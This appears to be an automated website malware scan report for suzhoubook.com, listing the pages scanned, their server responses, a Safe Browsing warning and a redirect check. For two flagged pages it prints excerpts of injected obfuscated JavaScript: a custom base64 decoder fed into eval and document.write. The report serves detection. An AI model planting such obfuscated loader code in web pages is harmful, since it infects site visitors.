Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=suzhoubook.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.suzhoubook.com/ | 200 OK Content-Length: 94833 Content-Type: text/html | clean |
http://www.suzhoubook.com/../sdcx.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.suzhoubook.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.suzhoubook.com/index.asp | 200 OK Content-Length: 94833 Content-Type: text/html | clean |
http://www.suzhoubook.com/xwgj.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/rdtj.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/syxw.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/xssj.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/tstj.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/ydzx.asp | 200 OK Content-Length: 34805 Content-Type: text/html | clean |
http://www.suzhoubook.com/tsssmain.asp | 200 OK Content-Length: 27902 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
    var a1 = "ABCDEFG";
    var a2 = "HIJKLMNOP";
    var a3 = "QRSTUVWXYZabcdef";
    var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";
    function mydata(input){
    var output="";
    var chr1,chr2,chr3="";
    var enc1,enc2,enc3,enc4="";
    var i=0;
    var base64test=/[^A-Za-z0-9\+\/\=]/g;
    input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");
    do{
    enc1=keyStrs.indexOf(input.charAt(i++));
    enc2=keyStrs.indexOf(input.charAt(i++));
    enc3
    t=eval("mydata(String.fromCharCode("+t+"))");
    document.write(t);
Antivirus reports:
http://www.suzhoubook.com/xhly2.asp | 200 OK Content-Length: 33372 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
    var a1 = "ABCDEFG";
    var a2 = "HIJKLMNOP";
    var a3 = "QRSTUVWXYZabcdef";
    var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";
    function mydata(input){
    var output="";
    var chr1,chr2,chr3="";
    var enc1,enc2,enc3,enc4="";
    var i=0;
    var base64test=/[^A-Za-z0-9\+\/\=]/g;
    input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");
    do{
    enc1=keyStrs.indexOf(input.charAt(i++));
    enc2=keyStrs.indexOf(input.charAt(i++));
    enc3
    t=eval("mydata(String.fromCharCode("+t+"))");
    document.write(t);
Antivirus reports:
http://www.suzhoubook.com/bbs/index.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Fri, 26 Dec 2014 08:56:55 GMT Location: showerr.asp?action=stop Server: Microsoft-IIS/6.0 Content-Length: 144 Content-Type: text/html; Charset=GB2312 Set-Cookie: ASPSESSIONIDCSARQARA=FIPNKNGCEENMOLKNKBMCOABO; path=/ X-Powered-By: ASP.NET | clean |
http://www.suzhoubook.com/bbs/showerr.asp?action=stop | 200 OK Content-Length: 1735 Content-Type: text/html | clean |
http://www.suzhoubook.com/bbs/inc/dv_wnd.js | 200 OK Content-Length: 4011 Content-Type: application/x-javascript | clean |
http://www.suzhoubook.com/bbs/inc/main82.js | 200 OK Content-Length: 23074 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: suzhoubook.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: suzhoubook.com
Referer: http://www.google.com/search?q=suzhoubook.com
Result:
The result is similar to the first query. There are no suspicious redirects found.